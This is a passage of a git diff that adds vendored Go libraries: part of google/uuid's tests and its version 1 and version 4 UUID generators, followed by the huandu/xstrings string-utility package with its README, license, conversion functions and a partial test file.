!bytes.Equal(nid, node2) { + t.Errorf("NodeID is %x, expected %x", node2, nid) + } +} + +func testDCE(t *testing.T, name string, uuid UUID, err error, domain Domain, id uint32) { + if err != nil { + t.Errorf("%s failed: %v", name, err) + return + } + if v := uuid.Version(); v != 2 { + t.Errorf("%s: %s: expected version 2, got %s", name, uuid, v) + return + } + if v := uuid.Domain(); v != domain { + t.Errorf("%s: %s: expected domain %d, got %d", name, uuid, domain, v) + } + if v := uuid.ID(); v != id { + t.Errorf("%s: %s: expected id %d, got %d", name, uuid, id, v) + } +} + +func TestDCE(t *testing.T) { + uuid, err := NewDCESecurity(42, 12345678) + testDCE(t, "NewDCESecurity", uuid, err, 42, 12345678) + uuid, err = NewDCEPerson() + testDCE(t, "NewDCEPerson", uuid, err, Person, uint32(os.Getuid())) + uuid, err = NewDCEGroup() + testDCE(t, "NewDCEGroup", uuid, err, Group, uint32(os.Getgid())) +} + +type badRand struct{} + +func (r badRand) Read(buf []byte) (int, error) { + for i, _ := range buf { + buf[i] = byte(i) + } + return len(buf), nil +} + +func TestBadRand(t *testing.T) { + SetRand(badRand{}) + uuid1 := New() + uuid2 := New() + if uuid1 != uuid2 { + t.Errorf("execpted duplicates, got %q and %q", uuid1, uuid2) + } + SetRand(nil) + uuid1 = New() + uuid2 = New() + if uuid1 == uuid2 { + t.Errorf("unexecpted duplicates, got %q", uuid1) + } +} + +var asString = "f47ac10b-58cc-0372-8567-0e02b2c3d479" +var asBytes = []byte(asString) + +func BenchmarkParse(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := Parse(asString) + if err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkParseBytes(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := ParseBytes(asBytes) + if err != nil { + b.Fatal(err) + } + } +} + +// parseBytesUnsafe is to benchmark using unsafe. +func parseBytesUnsafe(b []byte) (UUID, error) { + return Parse(*(*string)(unsafe.Pointer(&b))) +} + + +func BenchmarkParseBytesUnsafe(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := parseBytesUnsafe(asBytes) + if err != nil { + b.Fatal(err) + } + } +} + +// parseBytesCopy is to benchmark not using unsafe. +func parseBytesCopy(b []byte) (UUID, error) { + return Parse(string(b)) +} + +func BenchmarkParseBytesCopy(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := parseBytesCopy(asBytes) + if err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkNew(b *testing.B) { + for i := 0; i < b.N; i++ { + New() + } +} + +func BenchmarkUUID_String(b *testing.B) { + uuid, err := Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479") + if err != nil { + b.Fatal(err) + } + for i := 0; i < b.N; i++ { + if uuid.String() == "" { + b.Fatal("invalid uuid") + } + } +} + +func BenchmarkUUID_URN(b *testing.B) { + uuid, err := Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479") + if err != nil { + b.Fatal(err) + } + for i := 0; i < b.N; i++ { + if uuid.URN() == "" { + b.Fatal("invalid uuid") + } + } +} diff --git a/vendor/github.com/google/uuid/version1.go b/vendor/github.com/google/uuid/version1.go new file mode 100644 index 0000000000..22dc07cdce --- /dev/null +++ b/vendor/github.com/google/uuid/version1.go @@ -0,0 +1,44 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "encoding/binary" +) + +// NewUUID returns a Version 1 UUID based on the current NodeID and clock +// sequence, and the current time. If the NodeID has not been set by SetNodeID +// or SetNodeInterface then it will be set automatically. If the NodeID cannot +// be set NewUUID returns nil. If clock sequence has not been set by +// SetClockSequence then it will be set automatically. If GetTime fails to +// return the current NewUUID returns Nil and an error. +// +// In most cases, New should be used. +func NewUUID() (UUID, error) { + nodeMu.Lock() + if nodeID == zeroID { + setNodeInterface("") + } + nodeMu.Unlock() + + var uuid UUID + now, seq, err := GetTime() + if err != nil { + return uuid, err + } + + timeLow := uint32(now & 0xffffffff) + timeMid := uint16((now >> 32) & 0xffff) + timeHi := uint16((now >> 48) & 0x0fff) + timeHi |= 0x1000 // Version 1 + + binary.BigEndian.PutUint32(uuid[0:], timeLow) + binary.BigEndian.PutUint16(uuid[4:], timeMid) + binary.BigEndian.PutUint16(uuid[6:], timeHi) + binary.BigEndian.PutUint16(uuid[8:], seq) + copy(uuid[10:], nodeID[:]) + + return uuid, nil +} diff --git a/vendor/github.com/google/uuid/version4.go b/vendor/github.com/google/uuid/version4.go new file mode 100644 index 0000000000..390dd2cad4 --- /dev/null +++ b/vendor/github.com/google/uuid/version4.go @@ -0,0 +1,38 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import "io" + +// New is creates a new random UUID or panics. New is equivalent to +// the expression +// +// uuid.Must(uuid.NewRandom()) +func New() UUID { + return Must(NewRandom()) +} + +// NewRandom returns a Random (Version 4) UUID or panics. +// +// The strength of the UUIDs is based on the strength of the crypto/rand +// package. +// +// A note about uniqueness derived from from the UUID Wikipedia entry: +// +// Randomly generated UUIDs have 122 random bits. One's annual risk of being +// hit by a meteorite is estimated to be one chance in 17 billion, that +// means the probability is about 0.00000000006 (6 × 10−11), +// equivalent to the odds of creating a few tens of trillions of UUIDs in a +// year and having one duplicate. +func NewRandom() (UUID, error) { + var uuid UUID + _, err := io.ReadFull(rander, uuid[:]) + if err != nil { + return Nil, err + } + uuid[6] = (uuid[6] & 0x0f) | 0x40 // Version 4 + uuid[8] = (uuid[8] & 0x3f) | 0x80 // Variant is 10 + return uuid, nil +} diff --git a/vendor/github.com/huandu/xstrings/.gitignore b/vendor/github.com/huandu/xstrings/.gitignore new file mode 100644 index 0000000000..daf913b1b3 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/.gitignore @@ -0,0 +1,24 @@ +# Compiled Object files, Static and Dynamic libs (Shared Objects) +*.o +*.a +*.so + +# Folders +_obj +_test + +# Architecture specific extensions/prefixes +*.[568vq] +[568vq].out + +*.cgo1.go +*.cgo2.c +_cgo_defun.c +_cgo_gotypes.go +_cgo_export.* + +_testmain.go + +*.exe +*.test +*.prof diff --git a/vendor/github.com/huandu/xstrings/.travis.yml b/vendor/github.com/huandu/xstrings/.travis.yml new file mode 100644 index 0000000000..4f2ee4d973 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/.travis.yml @@ -0,0 +1 @@ +language: go diff --git a/vendor/github.com/huandu/xstrings/CONTRIBUTING.md b/vendor/github.com/huandu/xstrings/CONTRIBUTING.md new file mode 100644 index 0000000000..d7b4b8d584 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/CONTRIBUTING.md @@ -0,0 +1,23 @@ +# Contributing # + +Thanks for your contribution in advance. No matter what you will contribute to this project, pull request or bug report or feature discussion, it's always highly appreciated. + +## New API or feature ## + +I want to speak more about how to add new functions to this package. + +Package `xstring` is a collection of useful string functions which should be implemented in Go. It's a bit subject to say which function should be included and which should not. I set up following rules in order to make it clear and as objective as possible. + +* Rule 1: Only string algorithm, which takes string as input, can be included. +* Rule 2: If a function has been implemented in package `string`, it must not be included. +* Rule 3: If a function is not language neutral, it must not be included. +* Rule 4: If a function is a part of standard library in other languages, it can be included. +* Rule 5: If a function is quite useful in some famous framework or library, it can be included. + +New function must be discussed in project issues before submitting any code. If a pull request with new functions is sent without any ref issue, it will be rejected. + +## Pull request ## + +Pull request is always welcome. Just make sure you have run `go fmt` and all test cases passed before submit. + +If the pull request is to add a new API or feature, don't forget to update README.md and add new API in function list. diff --git a/vendor/github.com/huandu/xstrings/LICENSE b/vendor/github.com/huandu/xstrings/LICENSE new file mode 100644 index 0000000000..2701772593 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/LICENSE @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2015 Huan Du + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + diff --git a/vendor/github.com/huandu/xstrings/README.md b/vendor/github.com/huandu/xstrings/README.md new file mode 100644 index 0000000000..c824a5c3f2 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/README.md @@ -0,0 +1,114 @@ +# xstrings # + +[![Build Status](https://travis-ci.org/huandu/xstrings.svg?branch=master)](https://travis-ci.org/huandu/xstrings) +[![GoDoc](https://godoc.org/github.com/huandu/xstrings?status.svg)](https://godoc.org/github.com/huandu/xstrings) + +Go package [xstrings](https://godoc.org/github.com/huandu/xstrings) is a collection of string functions, which are widely used in other languages but absent in Go package [strings](http://golang.org/pkg/strings). + +All functions are well tested and carefully tuned for performance. + +## Propose a new function ## + +Please review [contributing guideline](CONTRIBUTING.md) and [create new issue](https://github.com/huandu/xstrings/issues) to state why it should be included. + +## Install ## + +Use `go get` to install this library. + + go get github.com/huandu/xstrings + +## API document ## + +See [GoDoc](https://godoc.org/github.com/huandu/xstrings) for full document. + +## Function list ## + +Go functions have a unique naming style. One, who has experience in other language but new in Go, may have difficulties to find out right string function to use. + +Here is a list of functions in [strings](http://golang.org/pkg/strings) and [xstrings](https://godoc.org/github.com/huandu/xstrings) with enough extra information about how to map these functions to their friends in other languages. Hope this list could be helpful for fresh gophers. + +### Package `xstrings` functions ### + +*Keep this table sorted by Function in ascending order.* + +| Function | Friends | # | +| -------- | ------- | --- | +| [Center](https://godoc.org/github.com/huandu/xstrings#Center) | `str.center` in Python; `String#center` in Ruby | [#30](https://github.com/huandu/xstrings/issues/30) | +| [Count](https://godoc.org/github.com/huandu/xstrings#Count) | `String#count` in Ruby | [#16](https://github.com/huandu/xstrings/issues/16) | +| [Delete](https://godoc.org/github.com/huandu/xstrings#Delete) | `String#delete` in Ruby | [#17](https://github.com/huandu/xstrings/issues/17) | +| [ExpandTabs](https://godoc.org/github.com/huandu/xstrings#ExpandTabs) | `str.expandtabs` in Python | [#27](https://github.com/huandu/xstrings/issues/27) | +| [FirstRuneToLower](https://godoc.org/github.com/huandu/xstrings#FirstRuneToLower) | `lcfirst` in PHP or Perl | [#15](https://github.com/huandu/xstrings/issues/15) | +| [FirstRuneToUpper](https://godoc.org/github.com/huandu/xstrings#FirstRuneToUpper) | `String#capitalize` in Ruby; `ucfirst` in PHP or Perl | [#15](https://github.com/huandu/xstrings/issues/15) | +| [Insert](https://godoc.org/github.com/huandu/xstrings#Insert) | `String#insert` in Ruby | [#18](https://github.com/huandu/xstrings/issues/18) | +| [LastPartition](https://godoc.org/github.com/huandu/xstrings#LastPartition) | `str.rpartition` in Python; `String#rpartition` in Ruby | [#19](https://github.com/huandu/xstrings/issues/19) | +| [LeftJustify](https://godoc.org/github.com/huandu/xstrings#LeftJustify) | `str.ljust` in Python; `String#ljust` in Ruby | [#28](https://github.com/huandu/xstrings/issues/28) | +| [Len](https://godoc.org/github.com/huandu/xstrings#Len) | `mb_strlen` in PHP | [#23](https://github.com/huandu/xstrings/issues/23) | +| [Partition](https://godoc.org/github.com/huandu/xstrings#Partition) | `str.partition` in Python; `String#partition` in Ruby | [#10](https://github.com/huandu/xstrings/issues/10) | +| [Reverse](https://godoc.org/github.com/huandu/xstrings#Reverse) | `String#reverse` in Ruby; `strrev` in PHP; `reverse` in Perl | [#7](https://github.com/huandu/xstrings/issues/7) | +| [RightJustify](https://godoc.org/github.com/huandu/xstrings#RightJustify) | `str.rjust` in Python; `String#rjust` in Ruby | [#29](https://github.com/huandu/xstrings/issues/29) | +| [RuneWidth](https://godoc.org/github.com/huandu/xstrings#RuneWidth) | - | [#27](https://github.com/huandu/xstrings/issues/27) | +| [Scrub](https://godoc.org/github.com/huandu/xstrings#Scrub) | `String#scrub` in Ruby | [#20](https://github.com/huandu/xstrings/issues/20) | +| [Shuffle](https://godoc.org/github.com/huandu/xstrings#Shuffle) | `str_shuffle` in PHP | [#13](https://github.com/huandu/xstrings/issues/13) | +| [ShuffleSource](https://godoc.org/github.com/huandu/xstrings#ShuffleSource) | `str_shuffle` in PHP | [#13](https://github.com/huandu/xstrings/issues/13) | +| [Slice](https://godoc.org/github.com/huandu/xstrings#Slice) | `mb_substr` in PHP | [#9](https://github.com/huandu/xstrings/issues/9) | +| [Squeeze](https://godoc.org/github.com/huandu/xstrings#Squeeze) | `String#squeeze` in Ruby | [#11](https://github.com/huandu/xstrings/issues/11) | +| [Successor](https://godoc.org/github.com/huandu/xstrings#Successor) | `String#succ` or `String#next` in Ruby | [#22](https://github.com/huandu/xstrings/issues/22) | +| [SwapCase](https://godoc.org/github.com/huandu/xstrings#SwapCase) | `str.swapcase` in Python; `String#swapcase` in Ruby | [#12](https://github.com/huandu/xstrings/issues/12) | +| [ToCamelCase](https://godoc.org/github.com/huandu/xstrings#ToCamelCase) | `String#camelize` in RoR | [#1](https://github.com/huandu/xstrings/issues/1) | +| [ToSnakeCase](https://godoc.org/github.com/huandu/xstrings#ToSnakeCase) | `String#underscore` in RoR | [#1](https://github.com/huandu/xstrings/issues/1) | +| [Translate](https://godoc.org/github.com/huandu/xstrings#Translate) | `str.translate` in Python; `String#tr` in Ruby; `strtr` in PHP; `tr///` in Perl | [#21](https://github.com/huandu/xstrings/issues/21) | +| [Width](https://godoc.org/github.com/huandu/xstrings#Width) | `mb_strwidth` in PHP | [#26](https://github.com/huandu/xstrings/issues/26) | +| [WordCount](https://godoc.org/github.com/huandu/xstrings#WordCount) | `str_word_count` in PHP | [#14](https://github.com/huandu/xstrings/issues/14) | +| [WordSplit](https://godoc.org/github.com/huandu/xstrings#WordSplit) | - | [#14](https://github.com/huandu/xstrings/issues/14) | + +### Package `strings` functions ### + +*Keep this table sorted by Function in ascending order.* + +| Function | Friends | +| -------- | ------- | +| [Contains](http://golang.org/pkg/strings/#Contains) | `String#include?` in Ruby | +| [ContainsAny](http://golang.org/pkg/strings/#ContainsAny) | - | +| [ContainsRune](http://golang.org/pkg/strings/#ContainsRune) | - | +| [Count](http://golang.org/pkg/strings/#Count) | `str.count` in Python; `substr_count` in PHP | +| [EqualFold](http://golang.org/pkg/strings/#EqualFold) | `stricmp` in PHP; `String#casecmp` in Ruby | +| [Fields](http://golang.org/pkg/strings/#Fields) | `str.split` in Python; `split` in Perl; `String#split` in Ruby | +| [FieldsFunc](http://golang.org/pkg/strings/#FieldsFunc) | - | +| [HasPrefix](http://golang.org/pkg/strings/#HasPrefix) | `str.startswith` in Python; `String#start_with?` in Ruby | +| [HasSuffix](http://golang.org/pkg/strings/#HasSuffix) | `str.endswith` in Python; `String#end_with?` in Ruby | +| [Index](http://golang.org/pkg/strings/#Index) | `str.index` in Python; `String#index` in Ruby; `strpos` in PHP; `index` in Perl | +| [IndexAny](http://golang.org/pkg/strings/#IndexAny) | - | +| [IndexByte](http://golang.org/pkg/strings/#IndexByte) | - | +| [IndexFunc](http://golang.org/pkg/strings/#IndexFunc) | - | +| [IndexRune](http://golang.org/pkg/strings/#IndexRune) | - | +| [Join](http://golang.org/pkg/strings/#Join) | `str.join` in Python; `Array#join` in Ruby; `implode` in PHP; `join` in Perl | +| [LastIndex](http://golang.org/pkg/strings/#LastIndex) | `str.rindex` in Python; `String#rindex`; `strrpos` in PHP; `rindex` in Perl | +| [LastIndexAny](http://golang.org/pkg/strings/#LastIndexAny) | - | +| [LastIndexFunc](http://golang.org/pkg/strings/#LastIndexFunc) | - | +| [Map](http://golang.org/pkg/strings/#Map) | `String#each_codepoint` in Ruby | +| [Repeat](http://golang.org/pkg/strings/#Repeat) | operator `*` in Python and Ruby; `str_repeat` in PHP | +| [Replace](http://golang.org/pkg/strings/#Replace) | `str.replace` in Python; `String#sub` in Ruby; `str_replace` in PHP | +| [Split](http://golang.org/pkg/strings/#Split) | `str.split` in Python; `String#split` in Ruby; `explode` in PHP; `split` in Perl | +| [SplitAfter](http://golang.org/pkg/strings/#SplitAfter) | - | +| [SplitAfterN](http://golang.org/pkg/strings/#SplitAfterN) | - | +| [SplitN](http://golang.org/pkg/strings/#SplitN) | `str.split` in Python; `String#split` in Ruby; `explode` in PHP; `split` in Perl | +| [Title](http://golang.org/pkg/strings/#Title) | `str.title` in Python | +| [ToLower](http://golang.org/pkg/strings/#ToLower) | `str.lower` in Python; `String#downcase` in Ruby; `strtolower` in PHP; `lc` in Perl | +| [ToLowerSpecial](http://golang.org/pkg/strings/#ToLowerSpecial) | - | +| [ToTitle](http://golang.org/pkg/strings/#ToTitle) | - | +| [ToTitleSpecial](http://golang.org/pkg/strings/#ToTitleSpecial) | - | +| [ToUpper](http://golang.org/pkg/strings/#ToUpper) | `str.upper` in Python; `String#upcase` in Ruby; `strtoupper` in PHP; `uc` in Perl | +| [ToUpperSpecial](http://golang.org/pkg/strings/#ToUpperSpecial) | - | +| [Trim](http://golang.org/pkg/strings/#Trim) | `str.strip` in Python; `String#strip` in Ruby; `trim` in PHP | +| [TrimFunc](http://golang.org/pkg/strings/#TrimFunc) | - | +| [TrimLeft](http://golang.org/pkg/strings/#TrimLeft) | `str.lstrip` in Python; `String#lstrip` in Ruby; `ltrim` in PHP | +| [TrimLeftFunc](http://golang.org/pkg/strings/#TrimLeftFunc) | - | +| [TrimPrefix](http://golang.org/pkg/strings/#TrimPrefix) | - | +| [TrimRight](http://golang.org/pkg/strings/#TrimRight) | `str.rstrip` in Python; `String#rstrip` in Ruby; `rtrim` in PHP | +| [TrimRightFunc](http://golang.org/pkg/strings/#TrimRightFunc) | - | +| [TrimSpace](http://golang.org/pkg/strings/#TrimSpace) | `str.strip` in Python; `String#strip` in Ruby; `trim` in PHP | +| [TrimSuffix](http://golang.org/pkg/strings/#TrimSuffix) | `String#chomp` in Ruby; `chomp` in Perl | + +## License ## + +This library is licensed under MIT license. See LICENSE for details. diff --git a/vendor/github.com/huandu/xstrings/common.go b/vendor/github.com/huandu/xstrings/common.go new file mode 100644 index 0000000000..2aff57aab4 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/common.go @@ -0,0 +1,25 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" +) + +const bufferMaxInitGrowSize = 2048 + +// Lazy initialize a buffer. +func allocBuffer(orig, cur string) *bytes.Buffer { + output := &bytes.Buffer{} + maxSize := len(orig) * 4 + + // Avoid to reserve too much memory at once. + if maxSize > bufferMaxInitGrowSize { + maxSize = bufferMaxInitGrowSize + } + + output.Grow(maxSize) + output.WriteString(orig[:len(orig)-len(cur)]) + return output +} diff --git a/vendor/github.com/huandu/xstrings/convert.go b/vendor/github.com/huandu/xstrings/convert.go new file mode 100644 index 0000000000..783e73b673 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/convert.go @@ -0,0 +1,364 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "math/rand" + "unicode" + "unicode/utf8" +) + +// ToCamelCase can convert all lower case characters behind underscores +// to upper case character. +// Underscore character will be removed in result except following cases. +// * More than 1 underscore. +// "a__b" => "A_B" +// * At the beginning of string. +// "_a" => "_A" +// * At the end of string. +// "ab_" => "Ab_" +func ToCamelCase(str string) string { + if len(str) == 0 { + return "" + } + + buf := &bytes.Buffer{} + var r0, r1 rune + var size int + + // leading '_' will appear in output. + for len(str) > 0 { + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if r0 != '_' { + break + } + + buf.WriteRune(r0) + } + + if len(str) == 0 { + return buf.String() + } + + r0 = unicode.ToUpper(r0) + + for len(str) > 0 { + r1 = r0 + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if r1 == '_' && r0 == '_' { + buf.WriteRune(r1) + continue + } + + if r1 == '_' { + r0 = unicode.ToUpper(r0) + } else { + r0 = unicode.ToLower(r0) + } + + if r1 != '_' { + buf.WriteRune(r1) + } + } + + buf.WriteRune(r0) + return buf.String() +} + +// ToSnakeCase can convert all upper case characters in a string to +// underscore format. +// +// Some samples. +// "FirstName" => "first_name" +// "HTTPServer" => "http_server" +// "NoHTTPS" => "no_https" +// "GO_PATH" => "go_path" +// "GO PATH" => "go_path" // space is converted to underscore. +// "GO-PATH" => "go_path" // hyphen is converted to underscore. +func ToSnakeCase(str string) string { + if len(str) == 0 { + return "" + } + + buf := &bytes.Buffer{} + var prev, r0, r1 rune + var size int + + r0 = '_' + + for len(str) > 0 { + prev = r0 + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + switch { + case r0 == utf8.RuneError: + buf.WriteByte(byte(str[0])) + + case unicode.IsUpper(r0): + if prev != '_' { + buf.WriteRune('_') + } + + buf.WriteRune(unicode.ToLower(r0)) + + if len(str) == 0 { + break + } + + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if !unicode.IsUpper(r0) { + buf.WriteRune(r0) + break + } + + // find next non-upper-case character and insert `_` properly. + // it's designed to convert `HTTPServer` to `http_server`. + // if there are more than 2 adjacent upper case characters in a word, + // treat them as an abbreviation plus a normal word. + for len(str) > 0 { + r1 = r0 + r0, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if r0 == utf8.RuneError { + buf.WriteRune(unicode.ToLower(r1)) + buf.WriteByte(byte(str[0])) + break + } + + if !unicode.IsUpper(r0) { + if r0 == '_' || r0 == ' ' || r0 == '-' { + r0 = '_' + + buf.WriteRune(unicode.ToLower(r1)) + } else { + buf.WriteRune('_') + buf.WriteRune(unicode.ToLower(r1)) + buf.WriteRune(r0) + } + + break + } + + buf.WriteRune(unicode.ToLower(r1)) + } + + if len(str) == 0 || r0 == '_' { + buf.WriteRune(unicode.ToLower(r0)) + break + } + + default: + if r0 == ' ' || r0 == '-' { + r0 = '_' + } + + buf.WriteRune(r0) + } + } + + return buf.String() +} + +// SwapCase will swap characters case from upper to lower or lower to upper. +func SwapCase(str string) string { + var r rune + var size int + + buf := &bytes.Buffer{} + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + switch { + case unicode.IsUpper(r): + buf.WriteRune(unicode.ToLower(r)) + + case unicode.IsLower(r): + buf.WriteRune(unicode.ToUpper(r)) + + default: + buf.WriteRune(r) + } + + str = str[size:] + } + + return buf.String() +} + +// FirstRuneToUpper converts first rune to upper case if necessary. +func FirstRuneToUpper(str string) string { + if str == "" { + return str + } + + r, size := utf8.DecodeRuneInString(str) + + if !unicode.IsLower(r) { + return str + } + + buf := &bytes.Buffer{} + buf.WriteRune(unicode.ToUpper(r)) + buf.WriteString(str[size:]) + return buf.String() +} + +// FirstRuneToLower converts first rune to lower case if necessary. +func FirstRuneToLower(str string) string { + if str == "" { + return str + } + + r, size := utf8.DecodeRuneInString(str) + + if !unicode.IsUpper(r) { + return str + } + + buf := &bytes.Buffer{} + buf.WriteRune(unicode.ToLower(r)) + buf.WriteString(str[size:]) + return buf.String() +} + +// Shuffle randomizes runes in a string and returns the result. +// It uses default random source in `math/rand`. +func Shuffle(str string) string { + if str == "" { + return str + } + + runes := []rune(str) + index := 0 + + for i := len(runes) - 1; i > 0; i-- { + index = rand.Intn(i + 1) + + if i != index { + runes[i], runes[index] = runes[index], runes[i] + } + } + + return string(runes) +} + +// ShuffleSource randomizes runes in a string with given random source. +func ShuffleSource(str string, src rand.Source) string { + if str == "" { + return str + } + + runes := []rune(str) + index := 0 + r := rand.New(src) + + for i := len(runes) - 1; i > 0; i-- { + index = r.Intn(i + 1) + + if i != index { + runes[i], runes[index] = runes[index], runes[i] + } + } + + return string(runes) +} + +// Successor returns the successor to string. +// +// If there is one alphanumeric rune is found in string, increase the rune by 1. +// If increment generates a "carry", the rune to the left of it is incremented. +// This process repeats until there is no carry, adding an additional rune if necessary. +// +// If there is no alphanumeric rune, the rightmost rune will be increased by 1 +// regardless whether the result is a valid rune or not. +// +// Only following characters are alphanumeric. +// * a - z +// * A - Z +// * 0 - 9 +// +// Samples (borrowed from ruby's String#succ document): +// "abcd" => "abce" +// "THX1138" => "THX1139" +// "<>" => "<>" +// "1999zzz" => "2000aaa" +// "ZZZ9999" => "AAAA0000" +// "***" => "**+" +func Successor(str string) string { + if str == "" { + return str + } + + var r rune + var i int + carry := ' ' + runes := []rune(str) + l := len(runes) + lastAlphanumeric := l + + for i = l - 1; i >= 0; i-- { + r = runes[i] + + if ('a' <= r && r <= 'y') || + ('A' <= r && r <= 'Y') || + ('0' <= r && r <= '8') { + runes[i]++ + carry = ' ' + lastAlphanumeric = i + break + } + + switch r { + case 'z': + runes[i] = 'a' + carry = 'a' + lastAlphanumeric = i + + case 'Z': + runes[i] = 'A' + carry = 'A' + lastAlphanumeric = i + + case '9': + runes[i] = '0' + carry = '0' + lastAlphanumeric = i + } + } + + // Needs to add one character for carry. + if i < 0 && carry != ' ' { + buf := &bytes.Buffer{} + buf.Grow(l + 4) // Reserve enough space for write. + + if lastAlphanumeric != 0 { + buf.WriteString(str[:lastAlphanumeric]) + } + + buf.WriteRune(carry) + + for _, r = range runes[lastAlphanumeric:] { + buf.WriteRune(r) + } + + return buf.String() + } + + // No alphanumeric character. Simply increase last rune's value. + if lastAlphanumeric == l { + runes[l-1]++ + } + + return string(runes) +} diff --git a/vendor/github.com/huandu/xstrings/convert_test.go b/vendor/github.com/huandu/xstrings/convert_test.go new file mode 100644 index 0000000000..30707a98a8 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/convert_test.go @@ -0,0 +1,165 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "sort" + "strings" + "testing" +) + +func TestToSnakeCase(t *testing.T) { + runTestCases(t, ToSnakeCase, _M{ + "HTTPServer": "http_server", + "_camelCase": "_camel_case", + "NoHTTPS": "no_https", + "Wi_thF": "wi_th_f", + "_AnotherTES_TCaseP": "_another_tes_t_case_p", + "ALL": "all", + "_HELLO_WORLD_": "_hello_world_", + "HELLO_WORLD": "hello_world", + "HELLO____WORLD": "hello____world", + "TW": "tw", + "_C": "_c", + + " sentence case ": "__sentence_case__", + " Mixed-hyphen case _and SENTENCE_case and UPPER-case": "_mixed_hyphen_case__and_sentence_case_and_upper_case", + }) +} + +func TestToCamelCase(t *testing.T) { + runTestCases(t, ToCamelCase, _M{ + "http_server": "HttpServer", + "_camel_case": "_CamelCase", + "no_https": "NoHttps", + "_complex__case_": "_Complex_Case_", + "all": "All", + "GOLANG_IS_GREAT": "GolangIsGreat", + "GOLANG": "Golang", + }) +} + +func TestSwapCase(t *testing.T) { + runTestCases(t, SwapCase, _M{ + "swapCase": "SWAPcASE", + "Θ~λa云Ξπ": "θ~ΛA云ξΠ", + }) +} + +func TestFirstRuneToUpper(t *testing.T) { + runTestCases(t, FirstRuneToUpper, _M{ + "hello, world!": "Hello, world!", + "Hello, world!": "Hello, world!", + "你好,世界!": "你好,世界!", + }) +} + +func TestFirstRuneToLower(t *testing.T) { + runTestCases(t, FirstRuneToLower, _M{ + "hello, world!": "hello, world!", + "Hello, world!": "hello, world!", + "你好,世界!": "你好,世界!", + }) +} + +func TestShuffle(t *testing.T) { + // It seems there is no reliable way to test shuffled string. + // Runner just make sure shuffled string has the same runes as origin string. + runner := func(str string) string { + s := Shuffle(str) + slice := sort.StringSlice(strings.Split(s, "")) + slice.Sort() + return strings.Join(slice, "") + } + + runTestCases(t, runner, _M{ + "": "", + "facgbheidjk": "abcdefghijk", + "尝试中文": "中尝文试", + "zh英文hun排": "hhnuz排文英", + }) +} + +type testShuffleSource int + +// A generated random number sequance just for testing. +var testShuffleTable = []int64{ + 1874068156324778273, + 3328451335138149956, + 5263531936693774911, + 7955079406183515637, + 2703501726821866378, + 2740103009342231109, + 6941261091797652072, + 1905388747193831650, + 7981306761429961588, + 6426100070888298971, + 4831389563158288344, + 261049867304784443, + 1460320609597786623, + 5600924393587988459, + 8995016276575641803, + 732830328053361739, + 5486140987150761883, + 545291762129038907, + 6382800227808658932, + 2781055864473387780, + 1598098976185383115, + 4990765271833742716, + 5018949295715050020, + 2568779411109623071, + 3902890183311134652, + 4893789450120281907, + 2338498362660772719, + 2601737961087659062, + 7273596521315663110, + 3337066551442961397, + 8121576815539813105, + 2740376916591569721, + 8249030965139585917, + 898860202204764712, + 9010467728050264449, + 685213522303989579, + 2050257992909156333, + 6281838661429879825, + 2227583514184312746, + 2873287401706343734, +} + +func (src testShuffleSource) Int63() int64 { + n := testShuffleTable[int(src)%len(testShuffleTable)] + src++ + return n +} + +func (src testShuffleSource) Seed(int64) {} + +func TestShuffleSource(t *testing.T) { + var src testShuffleSource + runner := func(str string) string { + return ShuffleSource(str, src) + } + + runTestCases(t, runner, _M{ + "": "", + "facgbheidjk": "bakefjgichd", + "尝试中文怎么样": "怎试中样尝么文", + "zh英文hun排": "hh英nzu文排", + }) +} + +func TestSuccessor(t *testing.T) { + runTestCases(t, Successor, _M{ + "": "", + "abcd": "abce", + "THX1138": "THX1139", + "<>": "<>", + "1999zzz": "2000aaa", + "ZZZ9999": "AAAA0000", + "***": "**+", + + "来点中文试试": "来点中文试诖", 